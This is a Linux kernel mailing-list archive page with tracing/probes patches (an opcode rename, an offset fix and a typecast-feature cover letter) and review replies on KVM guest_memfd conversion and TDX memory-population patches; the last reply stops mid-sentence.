Linux Trace Kernel
 help / color / mirror / Atom feed
* [PATCH v7 02/10] tracing/probes: Rename FETCH_OP_DATA to FETCH_OP_IMMSTR
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest
In-Reply-To: <178217904992.643090.15726197350652241270.stgit@devnote2>

From: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Since FETCH_OP_DATA is used solely to store immediate string
values, rename it to the more specific FETCH_OP_IMMSTR.

No behavior change, just rename it.

Signed-off-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>
---
 kernel/trace/trace_probe.c      |   12 ++++++------
 kernel/trace/trace_probe.h      |    2 +-
 kernel/trace/trace_probe_tmpl.h |    2 +-
 3 files changed, 8 insertions(+), 8 deletions(-)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index 502fa6da5949..d1c55596725b 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1307,7 +1307,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 				break;
 			ctx->offset = cur_offs;
 			if (code->op == FETCH_OP_COMM ||
-			    code->op == FETCH_OP_DATA) {
+			    code->op == FETCH_OP_IMMSTR) {
 				trace_probe_log_err(ctx->offset, COMM_CANT_DEREF);
 				return -EINVAL;
 			}
@@ -1328,7 +1328,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 			ret = __parse_imm_string(arg + 2, &tmp, ctx->offset + 2);
 			if (ret)
 				break;
-			code->op = FETCH_OP_DATA;
+			code->op = FETCH_OP_IMMSTR;
 			code->data = tmp;
 		} else {
 			ret = str_to_immediate(arg + 1, &code->immediate);
@@ -1483,7 +1483,7 @@ static int finalize_fetch_insn(struct fetch_insn *code,
 		} else {
 			if (code->op != FETCH_OP_DEREF && code->op != FETCH_OP_UDEREF &&
 			    code->op != FETCH_OP_IMM && code->op != FETCH_OP_COMM &&
-			    code->op != FETCH_OP_DATA && code->op != FETCH_OP_TP_ARG) {
+			    code->op != FETCH_OP_IMMSTR && code->op != FETCH_OP_TP_ARG) {
 				trace_probe_log_err(ctx->offset + type_offset,
 						    BAD_STRING);
 				return -EINVAL;
@@ -1492,7 +1492,7 @@ static int finalize_fetch_insn(struct fetch_insn *code,
 
 		if (!strcmp(parg->type->name, "symstr") ||
 		    (code->op == FETCH_OP_IMM || code->op == FETCH_OP_COMM ||
-		     code->op == FETCH_OP_DATA) || code->op == FETCH_OP_TP_ARG ||
+		     code->op == FETCH_OP_IMMSTR) || code->op == FETCH_OP_TP_ARG ||
 		     parg->count) {
 			/*
 			 * IMM, DATA and COMM is pointing actual address, those
@@ -1668,7 +1668,7 @@ static int traceprobe_parse_probe_arg_body(const char *argv, ssize_t *size,
 	if (ret < 0) {
 		for (code = tmp; code < tmp + FETCH_INSN_MAX; code++)
 			if (code->op == FETCH_NOP_SYMBOL ||
-			    code->op == FETCH_OP_DATA)
+			    code->op == FETCH_OP_IMMSTR)
 				kfree(code->data);
 	}
 	kfree(tmp);
@@ -1767,7 +1767,7 @@ void traceprobe_free_probe_arg(struct probe_arg *arg)
 
 	while (code && code->op != FETCH_OP_END) {
 		if (code->op == FETCH_NOP_SYMBOL ||
-		    code->op == FETCH_OP_DATA)
+		    code->op == FETCH_OP_IMMSTR)
 			kfree(code->data);
 		code++;
 	}
diff --git a/kernel/trace/trace_probe.h b/kernel/trace/trace_probe.h
index 0f09f7aaf93f..cd586e67b21a 100644
--- a/kernel/trace/trace_probe.h
+++ b/kernel/trace/trace_probe.h
@@ -94,7 +94,7 @@ enum fetch_op {
 	FETCH_OP_COMM,		/* Current comm */
 	FETCH_OP_ARG,		/* Function argument : .param */
 	FETCH_OP_FOFFS,		/* File offset: .immediate */
-	FETCH_OP_DATA,		/* Allocated data: .data */
+	FETCH_OP_IMMSTR,	/* Allocated string: .data */
 	FETCH_OP_EDATA,		/* Entry data: .offset */
 	// Stage 2 (dereference) op
 	FETCH_OP_DEREF,		/* Dereference: .offset */
diff --git a/kernel/trace/trace_probe_tmpl.h b/kernel/trace/trace_probe_tmpl.h
index f39b37fcdb3b..51436f19083b 100644
--- a/kernel/trace/trace_probe_tmpl.h
+++ b/kernel/trace/trace_probe_tmpl.h
@@ -109,7 +109,7 @@ process_common_fetch_insn(struct fetch_insn *code, unsigned long *val)
 	case FETCH_OP_COMM:
 		*val = (unsigned long)current->comm;
 		break;
-	case FETCH_OP_DATA:
+	case FETCH_OP_IMMSTR:
 		*val = (unsigned long)code->data;
 		break;
 	default:


^ permalink raw reply related

* [PATCH v7 01/10] tracing/probes: Fix double addition of offset for @+FOFFSET
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest
In-Reply-To: <178217904992.643090.15726197350652241270.stgit@devnote2>

From: Masami Hiramatsu (Google) <mhiramat@kernel.org>

Since commit 533059281ee5 ("tracing: probeevent: Introduce new argument
 fetching code") wrongly use @offset local variable during the parsing,
the offset value is added twice when dereferencing.
Reset the @offset after setting it in FETCH_OP_FOFFS.

Fixes: 533059281ee5 ("tracing: probeevent: Introduce new argument fetching code")
Signed-off-by: Masami Hiramatsu (Google) <mhiramat@kernel.org>
Cc: stable@vger.kernel.org
---
 kernel/trace/trace_probe.c |    1 +
 1 file changed, 1 insertion(+)

diff --git a/kernel/trace/trace_probe.c b/kernel/trace/trace_probe.c
index 98532c503d02..502fa6da5949 100644
--- a/kernel/trace/trace_probe.c
+++ b/kernel/trace/trace_probe.c
@@ -1241,6 +1241,7 @@ parse_probe_arg(char *arg, const struct fetch_type *type,
 
 			code->op = FETCH_OP_FOFFS;
 			code->immediate = (unsigned long)offset;  // imm64?
+			offset = 0;
 		} else {
 			/* uprobes don't support symbols */
 			if (!(ctx->flags & TPARG_FL_KERNEL)) {


^ permalink raw reply related

* [PATCH v7 00/10] tracing/probes: Add more typecast features
From: Masami Hiramatsu (Google) @ 2026-06-23  1:44 UTC (permalink / raw)
  To: Steven Rostedt, Mathieu Desnoyers
  Cc: Jonathan Corbet, Shuah Khan, Masami Hiramatsu, linux-kernel,
	linux-trace-kernel, linux-doc, linux-kselftest

Hi,

Here is the 7th version of series to introduce more typecast features
to probe events. The previous version is here:

 https://lore.kernel.org/all/178201238795.570818.15573963115625446598.stgit@devnote2/

In this version, I added 2 new fix and cleanup patches and update
according to Sashiko's review. [1/10] is a long-lived issue about
@+FOFFS, which was wrongly adding offset twice. [2/10] is a clean
up patch for renaming fetch_op name (good to dump it). 
This is applicable against probes/core branch on linux-trace tree.

Steve introduced BTF typecast feature for eprobe[1].
This series extends it and add more options:

1. Expanding BTF typecast to kprobe and fprobe.
   (currently only function entry/exit)

2. Introduce container_of like typecast. This adds a "assigned
   member" option to the typecast.

   (STRUCT,MEMBER)VAR->ANOTHER_MEMBER

   This casts VAR to STRUCT type but the VAR is as the address
   of STRUCT.MEMBER. In C, it is:

   container_of(VAR, STRUCT, MEMBER)->ANOTHER_MEMBER

3. Support nested typecast, e.g.

   (STRUCT)((STRUCT2)VAR->MEMBER2)->MEMBER

   the nest level must be smaller than 3.

4. Add $current variable to point "current" task_struct.
   This is useful with typecast, e.g.

   (task_struct)$current->pid

5. per-cpu dereference support.

   Intrdouce this_cpu_read(VAR) and this_cpu_ptr(VAR) to
   access per-cpu data on the current CPU (accessing other CPU
   data is not stable, because it can be changed.)

   You can access the member of per-cpu data structure using
   typecast like:

   (STRUCT)this_cpu_ptr(VAR)->MEMBER

And added fetcharg dump feature (for debug) and updated test scripts
to test part of them.

Thanks,

---
base-commit: 3ec75d0067f30eb5e0730f033766d6ab2feca7ae

Masami Hiramatsu (Google) (10):
      tracing/probes: Fix double addition of offset for @+FOFFSET
      tracing/probes: Rename FETCH_OP_DATA to FETCH_OP_IMMSTR
      tracing/probes: Support dumping fetcharg program for debugging dynamic events
      tracing/probes: Support typecast for various probe events
      tracing/probes: Support nested typecast
      tracing/probes: Type casting always involves nested calls
      tracing/probes: Support field specifier option for typecast
      tracing/probes: Add $current variable support
      tracing/probes: Add this_cpu_read() and this_cpu_ptr() dereference method to fetcharg
      tracing/probes: Add a new testcase for BTF typecasts


 Documentation/trace/eprobetrace.rst                |    9 
 Documentation/trace/fprobetrace.rst                |   10 
 Documentation/trace/kprobetrace.rst                |   11 
 kernel/trace/Kconfig                               |   11 
 kernel/trace/trace.c                               |    8 
 kernel/trace/trace_eprobe.c                        |    2 
 kernel/trace/trace_fprobe.c                        |    2 
 kernel/trace/trace_kprobe.c                        |    2 
 kernel/trace/trace_probe.c                         |  582 ++++++++++++++++----
 kernel/trace/trace_probe.h                         |   98 ++-
 kernel/trace/trace_probe_tmpl.h                    |   27 +
 kernel/trace/trace_uprobe.c                        |    3 
 samples/trace_events/trace-events-sample.c         |   40 +
 samples/trace_events/trace-events-sample.h         |   34 +
 .../ftrace/test.d/dynevent/btf_probe_event.tc      |   51 ++
 .../ftrace/test.d/dynevent/fprobe_syntax_errors.tc |   11 
 .../ftrace/test.d/kprobe/kprobe_syntax_errors.tc   |   11 
 .../ftrace/test.d/kprobe/uprobe_syntax_errors.tc   |    5 
 18 files changed, 756 insertions(+), 161 deletions(-)
 create mode 100644 tools/testing/selftests/ftrace/test.d/dynevent/btf_probe_event.tc

--
Masami Hiramatsu (Google) <mhiramat@kernel.org>

^ permalink raw reply

* Re: [PATCH v8 01/46] KVM: guest_memfd: Introduce per-gmem attributes, use to guard user mappings
From: Sean Christopherson @ 2026-06-23  1:37 UTC (permalink / raw)
  To: Binbin Wu
  Cc: ackerleytng, aik, andrew.jones, brauner, chao.p.peng, david,
	jmattson, jthoughton, michael.roth, oupton, pankaj.gupta, qperret,
	rick.p.edgecombe, rientjes, shivankg, steven.price, tabba, willy,
	wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <aceb07e1-77bc-49b6-a932-5fd9b5a21727@linux.intel.com>

On Mon, Jun 22, 2026, Binbin Wu wrote:
> On 6/19/2026 8:31 AM, Ackerley Tng via B4 Relay wrote:
> 
> [...]
> 
> >  
> > +static u64 kvm_gmem_get_attributes(struct inode *inode, pgoff_t index)
> > +{
> > +	struct maple_tree *mt = &GMEM_I(inode)->attributes;
> > +	void *entry = mtree_load(mt, index);
> > +
> > +	return WARN_ON_ONCE(!entry) ? 0 : xa_to_value(entry);
> 
> If the entry is unexpectedly missing, returning 0 means the attribute would
> be treated as shared.  And then in kvm_gmem_fault_user_mapping(), it would
> allow the userspace to fault in the folio.
> 
> Should gmem deny such edge case?

After several bugs this year where a WARN_ON_ONCE() fired, but was entirely
insufficient to prevent true badness, I'm definitely senstive to making the "bad"
behavior as harmless as possible.

However, in this case I think we're just hosed.  If KVM treats the memory as
private, KVM will incorrectly do prepare(), incorrectly allow populate(), and
will caused missed invalidations (though I suppose __kvm_gmem_set_attributes()
"only" lies to userspace in that case).

That said, assuming SHARED is definitely odd for cases where guest_memfd *can't*
hold shared memory.  Ditto for assuming PRIVATE.  What if we instead fall back to
the "init" state, e.g.?

static u64 kvm_gmem_get_attributes(struct inode *inode, pgoff_t index)
{
	struct maple_tree *mt = &GMEM_I(inode)->attributes;
	void *entry = mtree_load(mt, index);

	if (WARN_ON_ONCE(!entry)) {
		bool shared = GMEM_I(inode)->flags & GUEST_MEMFD_FLAG_INIT_SHARED;

		return shared ? 0 : KVM_MEMORY_ATTRIBUTE_PRIVATE;
	}

	return xa_to_value(entry);
}

^ permalink raw reply

* Re: [PATCH v8 23/46] KVM: TDX: Make source page optional for KVM_TDX_INIT_MEM_REGION
From: Sean Christopherson @ 2026-06-23  1:24 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTyj-JdW8H0ii2j3dayqnT2s3VV+brSG++p335=FGd2GXg@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> nit: why does it have Sean's SoB?

Heh, I had the same question at first.  It's because I tweaked the module param
name to gmem_in_place_conversion, and so updated this patch and sent that version
to Ackerley off-list.  Ackerley's SoB really should come last in this case, even
though it creates a somewhat weird SoB chain given the author.

^ permalink raw reply

* Re: [PATCH v8 23/46] KVM: TDX: Make source page optional for KVM_TDX_INIT_MEM_REGION
From: Sean Christopherson @ 2026-06-23  1:22 UTC (permalink / raw)
  To: Yan Zhao
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	tabba, willy, wyihan, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <ajjc0hw8PjGw69e9@yzhao56-desk.sh.intel.com>

On Mon, Jun 22, 2026, Yan Zhao wrote:
> On Thu, Jun 18, 2026 at 05:32:00PM -0700, Ackerley Tng via B4 Relay wrote:
> > From: Ackerley Tng <ackerleytng@google.com>
> > 
> > Update tdx_gmem_post_populate() to handle cases where a source page is
> > not explicitly provided. Instead of returning -EOPNOTSUPP when src_page
> > is NULL, default to using the page associated with the destination PFN.
> > 
> > This change allows for in-place memory conversion where the data is
> > already present in the target PFN, ensuring the TDX module has a valid
> > source page reference for the TDH.MEM.PAGE.ADD operation.
> > 
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> > Signed-off-by: Sean Christopherson <seanjc@google.com>
> > ---
> >  Documentation/virt/kvm/x86/intel-tdx.rst |  4 ++++
> >  arch/x86/kvm/vmx/tdx.c                   | 11 ++++++++---
> >  2 files changed, 12 insertions(+), 3 deletions(-)
> > 
> > diff --git a/Documentation/virt/kvm/x86/intel-tdx.rst b/Documentation/virt/kvm/x86/intel-tdx.rst
> > index 6a222e9d09541..74357fe87f9ec 100644
> > --- a/Documentation/virt/kvm/x86/intel-tdx.rst
> > +++ b/Documentation/virt/kvm/x86/intel-tdx.rst
> > @@ -158,6 +158,10 @@ KVM_TDX_INIT_MEM_REGION
> >  Initialize @nr_pages TDX guest private memory starting from @gpa with userspace
> >  provided data from @source_addr. @source_addr must be PAGE_SIZE-aligned.
> >  
> > +If guest_memfd in-place conversion is enabled, pass NULL for @source_addr to
> > +initialize the memory region using memory contents already populated in
> > +guest_memfd memory.
> > +
> >  Note, before calling this sub command, memory attribute of the range
> >  [gpa, gpa + nr_pages] needs to be private.  Userspace can use
> >  KVM_SET_MEMORY_ATTRIBUTES to set the attribute.
> > diff --git a/arch/x86/kvm/vmx/tdx.c b/arch/x86/kvm/vmx/tdx.c
> > index ffe9d0db58c59..56d10333c61a7 100644
> > --- a/arch/x86/kvm/vmx/tdx.c
> > +++ b/arch/x86/kvm/vmx/tdx.c
> > @@ -3198,8 +3198,12 @@ static int tdx_gmem_post_populate(struct kvm *kvm, gfn_t gfn, kvm_pfn_t pfn,
> >  	if (KVM_BUG_ON(kvm_tdx->page_add_src, kvm))
> >  		return -EIO;
> >  
> > -	if (!src_page)
> > -		return -EOPNOTSUPP;
> > +	if (!src_page) {
> > +		if (!gmem_in_place_conversion)
> When userspace turns on gmem_in_place_conversion while creating guest_memfd
> without the MMAP flag, the absence of src_page should still be treated as an
> error.

Why MMAP?  Shouldn't this be a general "if (!src_page && !up-to-date)"?  Just
because userspace _can_ mmap() the memory doesn't mean userspace _has_ mmap()'d
and written memory.  And when write() lands, MMAP wouldn't be necessary to
initialize the memory.

> Additionally, to properly enable in-place copying for the TDX initial memory
> region, userspace must not only specify source_addr to NULL, but also follow
> a specific sequence (where steps 1/2/3/7 are required only for in-place copy):
> 1. create guest_memfd with MMAP flag
> 2. mmap the guest_memfd.
> 3. convert the initial memory range to shared.
> 4. copy initial content to the source page.
> 5. convert the initial memory range to private
> 6. invoke ioctl KVM_TDX_INIT_MEM_REGION.
> 7. do not unmap the source backend.
> 
> So, would it be reasonable to introduce a dedicated flag that allows userspace
> to explicitly opt into the in-place copy functionality? e.g.,

Why?  It's userspace's responsibility to get the above right.  If userspace fails
to provide a src_page when it doesn't want in-place copy, that's a userspace bug.

^ permalink raw reply

* Re: [PATCH v8 15/46] KVM: guest_memfd: Call arch invalidate hooks on conversion
From: Sean Christopherson @ 2026-06-23  1:15 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTx+3U++dnhGEkwh2SO82xMugAvvJ9ee1O__sxZCKL_X5A@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> On Fri, 19 Jun 2026 at 01:31, Ackerley Tng via B4 Relay
> <devnull+ackerleytng.google.com@kernel.org> wrote:
> >
> > From: Ackerley Tng <ackerleytng@google.com>
> >
> > When memory in guest_memfd is converted from private to shared, the
> > platform-specific state associated with the guest-private pages must be
> > invalidated or cleaned up.
> >
> > Iterate over the folios in the affected range and call the
> > kvm_arch_gmem_invalidate() hook for each PFN range. This allows
> > architectures to perform necessary teardown, such as updating hardware
> > metadata or encryption states, before the pages are transitioned to the
> > shared state.
> >
> > Invoke this helper after indicating to KVM's mmu code that an invalidation
> > is in progress to stop in-flight page faults from succeeding.
> >
> > Reviewed-by: Fuad Tabba <tabba@google.com>
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> 
> Coming back to this after working through the arm64/pKVM side. My
> Reviewed-by here is from the previous round and the patch hasn't
> changed, but I missed an implication for arm64.
> 
> kvm_arch_gmem_invalidate() is now called from two paths with the same
> (start, end) signature: folio teardown (kvm_gmem_free_folio) and
> private->shared conversion (here). For SNP/TDX that's fine, conversion is
> destructive anyway. For pKVM the two need opposite content semantics:
> conversion must preserve the page in place (same physical page, the point
> of in-place conversion without encryption), while teardown must scrub it
> before returning it to the host.
>
> The hook gets only a pfn range with no indication of which caller it's
> serving, so arm64 can't give the two paths the behaviour they need. It
> would help to signal intent on the conversion path: a reason/flag, a
> separate hook, or not routing non-destructive conversion through the
> teardown hook.
> 
> arm64 isn't here yet, so this isn't urgent, but the hook is gaining a
> second caller now, and it's cheaper to leave room for the distinction
> than to change a generic contract other arches depend on later.

Crud.  It may not be urgent for arm64, but it's urgent for other reasons that
I "can't" describe in detail at the moment, and even if that weren't the case, I
think we should clean things up now.  More below.

> >  virt/kvm/guest_memfd.c | 41 +++++++++++++++++++++++++++++++++++++++++
> >  1 file changed, 41 insertions(+)
> >
> > diff --git a/virt/kvm/guest_memfd.c b/virt/kvm/guest_memfd.c
> > index 433f79047b9d1..3c94442bc8131 100644
> > --- a/virt/kvm/guest_memfd.c
> > +++ b/virt/kvm/guest_memfd.c
> > @@ -607,6 +607,42 @@ static bool kvm_gmem_is_safe_for_conversion(struct inode *inode, pgoff_t start,
> >         return safe;
> >  }
> >
> > +#ifdef CONFIG_HAVE_KVM_ARCH_GMEM_INVALIDATE
> > +static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)

Not your fault, but kvm_arch_gmem_invalidate() is badly misnamed.  It's not
"invalidating" anything, it's much more of a "free" callback, as SNP uses it to
put physical pages back into a shared state when a maybe-private folio is freed.

As Fuad points out, (ab)using that hook for the private=>shared conversion case
"works", but not broadly.  And it makes the bad name worse, because it's called
from code that _is_ doing true invalidations.  For pKVM, it may not even need to
do anything invalidation-like.

To avoid a conflict with patches that are going to have priority over this series,
to set the stage for arm64 support, and to avoid avoid bleeding vendor details
into guest_memfd, as if they are core guest_memfd behavior (only SNP needs the
"invalidation" on this specific transition), I think we should add an arch hook
to do conversions straightaway.

Unless there's a clever option I'm missing, it'll mean adding yet another
HAVE_KVM_ARCH_GMEM_XXX flag?  Hmm, especially because IIUC, arm64/pKVM doesn't
need a callback for this case, only the free_folio case.

> > +{
> > +       struct folio_batch fbatch;
> > +       pgoff_t next = start;
> > +       int i;
> > +
> > +       folio_batch_init(&fbatch);
> > +       while (filemap_get_folios(inode->i_mapping, &next, end - 1, &fbatch)) {
> > +               for (i = 0; i < folio_batch_count(&fbatch); ++i) {
> > +                       struct folio *folio = fbatch.folios[i];
> > +                       pgoff_t start_index, end_index;
> > +                       kvm_pfn_t start_pfn, end_pfn;
> > +
> > +                       start_index = max(start, folio->index);
> > +                       end_index = min(end, folio_next_index(folio));
> > +                       /*
> > +                        * end_index is either in folio or points to
> > +                        * the first page of the next folio. Hence,
> > +                        * all pages in range [start_index, end_index)
> > +                        * are contiguous.
> > +                        */
> > +                       start_pfn = folio_file_pfn(folio, start_index);
> > +                       end_pfn = start_pfn + end_index - start_index;
> > +
> > +                       kvm_arch_gmem_invalidate(start_pfn, end_pfn);
> > +               }
> > +
> > +               folio_batch_release(&fbatch);
> > +               cond_resched();
> > +       }
> > +}
> > +#else
> > +static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end) {}
> > +#endif
> > +
> >  static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
> >                                      size_t nr_pages, uint64_t attrs,
> >                                      pgoff_t *err_index)
> > @@ -647,7 +683,12 @@ static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
> >          */
> >
> >         kvm_gmem_invalidate_start(inode, start, end);
> > +
> > +       if (!to_private)
> > +               kvm_gmem_invalidate(inode, start, end);

E.g. instead make this something like this?

	kvm_gmem_set_pfn_attributes(...)

Hrm, though that wastes folio lookups in the to_private case.  So maybe just this,
assuming pKVM doesn't need to take additional action on conversions?

	if (!to_private)
		kvm_gmem_make_shared(...)

Actually, if we do that, then we don't need a separate arch hook, just a separate
config.  It'll still bleed SNP details into guest_memfd, but it'll at least be
done in a way that's more explicitly arch specific (and it's no different than
what we already do for PREPARE...).

E.g. this?  There will still be a looming rename conflict, but that's easy enough
to handle.

diff --git virt/kvm/guest_memfd.c virt/kvm/guest_memfd.c
index 9ce5be7843f2..8aead0abd788 100644
--- virt/kvm/guest_memfd.c
+++ virt/kvm/guest_memfd.c
@@ -648,8 +648,8 @@ static bool kvm_gmem_is_safe_for_conversion(struct inode *inode, pgoff_t start,
        return safe;
 }
 
-#ifdef CONFIG_HAVE_KVM_ARCH_GMEM_INVALIDATE
-static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)
+#ifdef CONFIG_KVM_ARCH_GMEM_FREE_ON_SHARED_CONVERSION
+static void kvm_gmem_make_shared(struct inode *inode, pgoff_t start, pgoff_t end)
 {
        struct folio_batch fbatch;
        pgoff_t next = start;
@@ -681,7 +681,7 @@ static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end)
        }
 }
 #else
-static void kvm_gmem_invalidate(struct inode *inode, pgoff_t start, pgoff_t end) {}
+static void kvm_gmem_make_shared(struct inode *inode, pgoff_t start, pgoff_t end) { }
 #endif
 
 static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
@@ -729,7 +729,7 @@ static int __kvm_gmem_set_attributes(struct inode *inode, pgoff_t start,
        kvm_gmem_invalidate_start(inode, start, end);
 
        if (!to_private)
-               kvm_gmem_invalidate(inode, start, end);
+               kvm_gmem_make_shared(inode, start, end);
 
        mas_store_prealloc(&mas, xa_mk_value(attrs));

^ permalink raw reply related

* Re: [PATCH v8 13/46] KVM: guest_memfd: Add base support for KVM_SET_MEMORY_ATTRIBUTES2
From: Sean Christopherson @ 2026-06-23  0:22 UTC (permalink / raw)
  To: Fuad Tabba
  Cc: ackerleytng, aik, andrew.jones, binbin.wu, brauner, chao.p.peng,
	david, jmattson, jthoughton, michael.roth, oupton, pankaj.gupta,
	qperret, rick.p.edgecombe, rientjes, shivankg, steven.price,
	willy, wyihan, yan.y.zhao, forkloop, pratyush, suzuki.poulose,
	aneesh.kumar, liam, Paolo Bonzini, Thomas Gleixner, Ingo Molnar,
	Borislav Petkov, Dave Hansen, x86, H. Peter Anvin, Steven Rostedt,
	Masami Hiramatsu, Mathieu Desnoyers, Jonathan Corbet, Shuah Khan,
	Shuah Khan, Vishal Annapurve, Andrew Morton, Chris Li,
	Kairui Song, Kemeng Shi, Nhat Pham, Barry Song, Axel Rasmussen,
	Yuanchu Xie, Wei Xu, Youngjun Park, Qi Zheng, Shakeel Butt,
	Kiryl Shutsemau, Baoquan He, Jason Gunthorpe, Vlastimil Babka,
	kvm, linux-kernel, linux-trace-kernel, linux-doc, linux-kselftest,
	linux-mm, linux-coco
In-Reply-To: <CA+EHjTx2xKjheiW5VzHw_TdWFUqdJqfgu=dOPa=_yaYBMY8uyw@mail.gmail.com>

On Fri, Jun 19, 2026, Fuad Tabba wrote:
> On Fri, 19 Jun 2026 at 01:31, Ackerley Tng via B4 Relay
> <devnull+ackerleytng.google.com@kernel.org> wrote:
> >
> > From: Ackerley Tng <ackerleytng@google.com>
> >
> > Introduce base support for KVM_SET_MEMORY_ATTRIBUTES2 in guest_memfd, which
> > just updates attributes tracked by guest_memfd.
> >
> > Validate input fields in general. Guard usage of KVM_SET_MEMORY_ATTRIBUTES2
> > by making sure requested attributes are supported for this instance of kvm.
> >
> > A new KVM_SET_MEMORY_ATTRIBUTES2 is defined to support writes (unlike
> > KVM_SET_MEMORY_ATTRIBUTES) in addition to reads so it can provide error
> > details to userspace. This will be used in a later patch.
> >
> > The two ioctls use their corresponding structs with no overlap, but
> > backward compatibility is baked in for future support of
> > KVM_SET_MEMORY_ATTRIBUTES2 and struct kvm_memory_attributes2 in the VM
> > ioctl.
> >
> > The process of setting memory attributes is set up such that the later half
> > will not fail due to allocation. Any necessary checks are performed before
> > the point of no return.
> >
> > Co-developed-by: Vishal Annapurve <vannapurve@google.com>
> > Signed-off-by: Vishal Annapurve <vannapurve@google.com>
> > Co-developed-by: Sean Christoperson <seanjc@google.com>
> > Signed-off-by: Sean Christoperson <seanjc@google.com>
> > Reviewed-by: Fuad Tabba <tabba@google.com>
> > Signed-off-by: Ackerley Tng <ackerleytng@google.com>
> 
> Note sure if it's user error on my part, if I'm applying this to the
> wrong base, but I found a build break here on patch 13:
> kvm_gmem_invalidate_start() doesn't exist in the base tree. The
> function is kvm_gmem_invalidate_begin() here. The rename
> (190cc5370a8b6) landed via a different merge path and isn't an
> ancestor of the stated base.
> 
> Patches 19 and 20 have the same mismatch. Fix for all three is
> s/kvm_gmem_invalidate_start/kvm_gmem_invalidate_begin/.

Ya, Ackerley used a slightly older kvm/next to send the patches.  I at least was
testing against kvm-x86/next, which does have the rename.

Other than noting that this should be applied against the current kvm/next, I
